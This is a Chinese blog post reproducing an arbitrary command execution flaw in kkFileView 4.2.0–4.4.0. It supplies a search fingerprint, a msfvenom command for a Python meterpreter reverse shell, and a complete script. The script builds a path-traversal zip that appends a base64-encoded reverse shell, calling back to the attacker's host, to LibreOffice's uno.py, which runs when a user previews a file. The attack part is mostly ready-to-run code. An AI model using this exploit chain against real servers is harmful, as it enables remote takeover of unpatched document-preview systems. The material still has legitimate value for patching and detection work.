[漏洞复现]kkfileview 任意命令执行漏洞

2024-06-08 346 0

kkfileview 任意命令执行漏洞

​ kkFileView 为文件文档在线预览解决方案,该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览,如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等。

指纹信息

title="kkfileview"

[漏洞复现]kkfileview 任意命令执行漏洞插图

漏洞复现

影响版本 4.2.0 <= kkfileview <= 4.4.0

[漏洞复现]kkfileview 任意命令执行漏洞插图1

漏洞复现在本地完成 centos7(部署kkfileview):192.168.20.128 kali:192.168.20.129

kkfileview采用docker部署

wget https://kkview.cn/resource/kkFileView-4.2.0-docker.tar
docker load -i kkFileView-4.2.0-docker.tar
docker run -itd -p 8012:8012 keking/kkfileview:4.2.0

该漏洞可通过路径穿越将恶意文件上传到任意位置,并会在存在的文件下追加内容,在kkfileview接收到odt文件并且上传人尝试预览时会调用/opt/libreoffice7.3/program/uno.py这个python文件来进行odt文件转换为pdf预览,使用msf生成python木马文件

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.20.129 LPORT=11321 -f raw -o kkview.py

[漏洞复现]kkfileview 任意命令执行漏洞插图2

利用python脚本生成可完成目录穿越的压缩包

import zipfile

if __name__ == "__main__":
    try:
        binary1 = b'test'
        binary2 = b'exec(__import__(\'base64\').b64decode(__import__(\'codecs\').getencoder(\'utf-8\')(\'aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjAuMTI5JywxMTMyMSkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoZCkpLHsncyc6c30pCg==\')[0]))'
        zipFile = zipfile.ZipFile("hack.zip", "a", zipfile.ZIP_DEFLATED)
        info = zipfile.ZipInfo("hack.zip")
        zipFile.writestr("test", binary1)
        zipFile.writestr("../../../../../../../../../../../../../../../../../../../opt/libreoffice7.3/program/uno.py", binary2)
        zipFile.close()
    except IOError as e:
        raise e

上传生成的hack.zip之后,点击预览激活该恶意文件追加内容到/opt/libreoffice7.3/program/uno.py

[漏洞复现]kkfileview 任意命令执行漏洞插图3

上传obt文件(可新建一个word文件另存为obt文件),点击预览,即可在msf上监听到shell上线

[漏洞复现]kkfileview 任意命令执行漏洞插图4


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

苹果试图保护你的隐私,OpenAI可能做不到
Shuffle:一款完全自动化的安全栈增强平台
如何使用CODASM编码Payload并降低熵值
SessionExec:一款针对会话安全的安全命令测试工具
Arkime:一款大规模数据包捕获和索引数据库系统
从蓝队流量角度分析Shiro-550反序列化漏洞

发布评论